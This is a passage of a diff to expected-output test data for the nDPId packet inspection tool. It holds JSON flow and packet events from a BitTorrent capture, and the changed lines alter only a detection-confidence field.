00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1455469976336,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976336,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4SfNAAEAGAADAqAEDxmSSCc6z6wOon+tuBozVl4AYZVEahAAAAQEIChncE1MB8nMrE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkC3tYvcSfI56Y="} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1455469976513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469976513,"pkt":"xCwDBkn+LFbcjDU0CABFEACEZqRAAHYGg6bGZJIJwKgBA+sDzrMGjNWXqJ\/rsoAYAQLT1gAAAQEICgHycz0Z3BNTE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wokMyLr47j7jk1aEAAADnFABkMTplaTA="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1455469976582,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976582,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4BctAAEAGAADAqAEDvmfDOM6ytinSUvXkM6bvoIAY+3dDtgAAAQEIChncFEcAv3iAE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkKv+eYrLs2+ChY="} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 01351{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1455469976697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":625,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":625,"pkt_l4_len":591,"thread_ts_msec":1455469976697,"pkt":"xCwDBkn+LFbcjDU0CABFEAJjaOxAAHYGf3\/GZJIJwKgBA+sDzrMGjNXnqJ\/rsoAYAQJs0QAAAQEICgHyc00Z3BQDZTQ6aXB2NDQ6xmSSCTEyOmNvbXBsZXRlX2Fnb2kxZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTE1ZTY6eW91cmlwNDpSN80BZQAAAHQFv\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/f\/\/\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/f\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/9\/\/\/\/\/\/7\/\/\/7\/+7\/\/f\/3\/f\/\/\/\/v\/\/\/\/\/\/\/9\/9\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/3\/\/\/\/gAAAAAUEAAAClgAAAAUEAAAA6gAAAAUEAAAAugAAAAUEAAAA4AAAAAUEAAABqgAAAAUEAAACZwAAAAUEAAACTwAAAAUEAAAC8gAAAAUEAAABiQAAAAUEAAAB3QAAAAUEAAADdAAAAAUEAAAC\/gAAAAUEAAACJgAAAAUEAAACiAAAAAUEAAACvwAAAAUEAAACeQAAAAUEAAABRQAAAAUEAAACCwAAAAUEAAAAkgAAAAUEAAACdQAAAAUEAAACoAAAAAUEAAAAAQAAAAUEAAAAFAAAAAUEAAADTw=="} 
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1455469977023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1455469977023,"pkt":"xCwDBkn+LFbcjDU0CABFAACFWMJAAHMGa2W+Z8M4wKgBA7YpzrIzpu+g0lL2KIAYAQKm2wAAAQEICgC\/ehQZ3BRHE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xovjV8bH+iIGCHSYAAAEBFABkMTplaTBl"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1455469977229,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469977229,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4L\/xAAEAGAADAqAEDlw8wvc61t5l0EJCE2E\/BJoAYIPWJ4gAAAQEIChncFslLXJigE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjv4JZL7rS4V2Vgo="} 
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1455469977285,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":1455469977285,"pkt":"xCwDBkn+LFbcjDU0CABFAACLG6xAAHIGY0mXDzC9wKgBA7eZzrXYT8EmdBCQyIAYAQLHiQAAAQEICktcmNgZ3BbJE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogWCKk\/sCNEtOuUAAADnFABkMTplaTBlNDppcHY0"} 01336{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1455469977324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":1455469977324,"pkt":"xCwDBkn+LFbcjDU0CABFAAJcG65AAHIGYXaXDzC9wKgBA7eZzrXYT8F9dBCQyIAZAQKR1gAAAQEICktcmOYZ3BbJNDqXDzC9MTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0NzAwMWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/\/\/\/\/7\/\/\/\/\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/u\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/37\/\/\/\/\/\/\/\/\/\/f\/\/3\/\/3\/\/\/7\/\/\/\/v\/\/f\/\/\/f\/\/\/3\/\/\/\/\/\/v\/\/f\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/3\/\/\/+AAAAABQQAAAMOAAAABQQAAAApAAAABQQAAAJ1AAAABQQAAAKiAAAABQQAAADVAAAABQQAAAH3AAAABQQAAANZAAAABQQAAADFAAAABQQAAAN2AAAABQQAAAD5AAAABQQAAAD9AAAABQQAAAL9AAAABQQAAAKRAAAABQQAAAK6AAAABQQAAAC9AAAABQQAAAFxAAAABQQAAAHwAAAABQQAAAJKAAAABQQAAAFDAAAABQQAAAJcAAAABQQAAABWAAAABQQAAALUAAAABQQAAAI2AAAABQQAAAB7"} 
01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1455469977685,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469977685,"pkt":"xCwDBkn+LFbcjDU0CABFAAJ8WMNAAHMGaW2+Z8M4wKgBA7YpzrIzpu\/x0lL2fIAYAQLBOgAAAQEICgC\/e9sZ3BX+NDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzEyOmNvbXBsZXRlX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDY2MzNlNDpyZXFxaTI1NWUxOnYxNjpCaXRUb3JyZW50IDcuOS41Mjp5cGk1MjkxNGU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/X\/\/\/v\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f+\/\/\/7\/\/\/\/v\/\/\/\/\/99\/\/+\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+7\/\/3\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/77\/\/\/f\/\/\/3\/3f\/3\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAApsAAAAFBAAAAk8AAAAFBAAAAtoAAAAFBAAAAWUAAAAFBAAAAxcAAAAFBAAAAVIAAAAFBAAAAsoAAAAFBAAAASUAAAAFBAAAADsAAAAFBAAAAOgAAAAFBAAAAg0AAAAFBAAAArAAAAAFBAAAApUAAAAFBAAAAtYAAAAFBAAAAIEAAAAFBAAAAQkAAAAFBAAAAugAAAAFBAAAAhEAAAAFBAAAAUwAAAAFBAAAAiIAAAAFBAAAAPMAAAAFBAAAAbAAAAAFBAAAACQAAAAFBAAAACI="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1455469978413,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978413,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DnNAAEAGAADAqAEDX+qfEM65oPXUDpz5ZKj0loAYkUPBEAAAAQEIChncG14CELSbE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvUWScco35PygrU="} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1455469978422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978422,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4xBlAAEAGAADAqAEDX+3BIs66LDm\/gbIP+oH76IAYlsHjJQAAAQEIChncG2YAA5hpE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvGP0W3l6zj59Ik="} 
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1455469978654,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978654,"pkt":"xCwDBkn+LFbcjDU0CABFAACrIv1AAHYG\/pRf7cEiwKgBAyw5zrr6gfvov4GyU4AYAQLALAAAAQEICgADmIEZ3BtmE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wog5gTbVhOs8MSY8AAADnFABkMTplaTBlNDppcHY0NDpf7cEiMTI6Y29tcGxldGVfYWdvaTJlMTptZDExOnU="} 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1455469978662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978662,"pkt":"xCwDBkn+LFbcjDU0CABFAACrdTRAAHcGzXJf6p8QwKgBA6D1zrlkqPSW1A6dPYAYAMM1JwAAAQEICgIQtLMZ3BteE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wos5cW3r846cWQCoAAADoFABkMTplaTBlNDppcHY0NDpf6p8QMTI6Y29tcGxldGVfYWdvaTQ1ZTE6bWQxMTo="} 
01296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1455469978678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1455469978678,"pkt":"xCwDBkn+LFbcjDU0CABFAAI9dTZAAHcGy95f6p8QwKgBA6D1zrlkqPUN1A6dPYAZAMPqbAAAAQEICgIQtLMZ3BtedXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTQxMjA1ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyMWU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/7\/\/\/\/\/\/\/\/\/f\/\/\/\/9\/\/\/\/3\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/7\/\/3\/f\/\/\/\/\/r\/\/\/v\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/3\/7\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/9\/\/f\/4AAAAAFBAAAACUAAAAFBAAAAJwAAAAFBAAAArkAAAAFBAAAAfAAAAAFBAAAA3QAAAAFBAAAAosAAAAFBAAAAZ8AAAAFBAAAAdUAAAAFBAAAAqwAAAAFBAAAAhUAAAAFBAAAAM0AAAAFBAAAAk4AAAAFBAAAAIAAAAAFBAAAA4IAAAAFBAAAAF4AAAAFBAAAAi0AAAAFBAAAAVYAAAAFBAAAAZcAAAAFBAAAA1AAAAAFBAAAAeYAAAAFBAAAAa8AAAAFBAAAAhcAAAAFBAAAAw0AAAAFBAAAARs="} 
